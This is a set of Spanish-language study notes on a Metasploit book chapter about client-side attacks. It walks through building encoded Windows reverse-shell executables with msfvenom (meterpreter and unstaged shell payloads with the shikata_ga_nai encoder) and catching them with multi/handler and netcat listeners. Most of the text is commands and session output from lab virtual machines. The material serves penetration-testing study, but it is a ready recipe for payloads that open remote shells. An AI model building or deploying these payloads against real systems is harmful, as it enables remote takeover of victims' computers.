Msfvenom_clientsideattacks Metasploit_Revelated_Sagar_Rahalkar
Apuntes inompletos Msfvenom libro: clientsideattacks Metasploit Revelated de Sagar Rahalkar
root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe ....
msfvenom -a x86 --platform windows \
-p windows/meterpreter/reverse_tcp \
LHOST=192.168.56.102 LPORT=8080 \
-e x86/shikata_ga_nai -f exe -o \
/root/payload_msfvenom_192_168_56_102_8080.exe
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=8080 -e x86/shikata_ga_nai -f exe -o /root/payload_msfvenom.exe Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai chosen with final size 368 Payload size: 368 bytes Final size of exe file: 73802 bytes Saved as: /root/payload_msfvenom.exe root@kali:~#
donde:
-a x86
es la arquitectura del procesador--platform windows
la plataforma-p windows/meterpreter/reverse_tcp
el tipo de payload/carga a crearLHOST=192.168.56.102
la ip a la que se conectara (parametros especificos del payload)LPORT=8080
el puerto al que se conectara.-e x86/shikata_ga_nai
el encoder a utilizar-f exe
el tipo de archivo a crear-o /root/payload_msfvenom.exe
el archivo de salida
Por otro lado tenemos que lanzar el socket/proceso a la escucha.
A la espera de que se ejecute el programa payload_msfvenom.exe
que hemos creado.
root@kali:~# msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.56.102; set lport 8080; run;exit -y" =[ metasploit v5.0.20-dev ] + -- --=[ 1886 exploits - 1065 auxiliary - 328 post ] + -- --=[ 546 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] payload => windows/meterpreter/reverse_tcp LHOST => 192.168.56.102 lport => 8080 [*] Started reverse TCP handler on 192.168.56.102:8080
En el momento en el que se lanza el payload_msfvenom.exe
en el cliente: Aparece la conexion en el servidor que estaba a la escucha.
[*] Sending stage (179779 bytes) to 192.168.56.1 [*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.1:48116) at 2019-07-23 05:26:40 -0400 meterpreter > sysinfo Computer : W7B-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : es_ES Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > meterpreter > meterpreter >
Otra forma. lanzo el “multi/handler” a mano desde msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set lport 8080
run
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > info Name: Generic Payload Handler ... Description: This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework. msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 192.168.56.102 msf5 exploit(multi/handler) > set lport 8080 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.102:8080
[*] Sending stage (179779 bytes) to 192.168.56.104 [*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.104:49157) at 2019-07-25 16:50:22 -0400 meterpreter >
meterpreter > sysinfo Computer : W7MINPC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : es_ES Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
meterpreter > sysinfo Computer : W7MINPC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : es_ES Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
Crear un Reverse no stagged.
https://medium.com/@hakluke/haklukes-guide-to-hacking-without-metasploit-1bbbe3d14f90
msfvenom -a x86 --platform windows \
-p windows/shell_reverse_tcp \
LHOST=192.168.56.102 LPORT=8080 \
-e x86/shikata_ga_nai -f exe -o \
/root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe
root@kali:~# msfvenom -a x86 --platform windows \ > -p windows/shell_reverse_tcp \ > LHOST=192.168.56.102 LPORT=8080 \ > -e x86/shikata_ga_nai -f exe -o \ > /root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 (iteration=0) x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of exe file: 73802 bytes Saved as: /root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe root@kali:~#
Ahora coloco un “listener” a la espera de que se ejecute el payload
nc -nvlp 8080
y cuando se lanza el payload ya tengo interprete de comandos.
root@kali:~# nc -nvlp 8080 listening on [any] 8080 ... connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 1041 '\\VBOXSVR\tmpW7\pentesting' CMD.EXE se inici� con esta ruta como el directorio actual. No se permiten rutas UNC. Regresando de manera predeterminada al directorio Windows. Microsoft Windows XP [Versi�n 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS>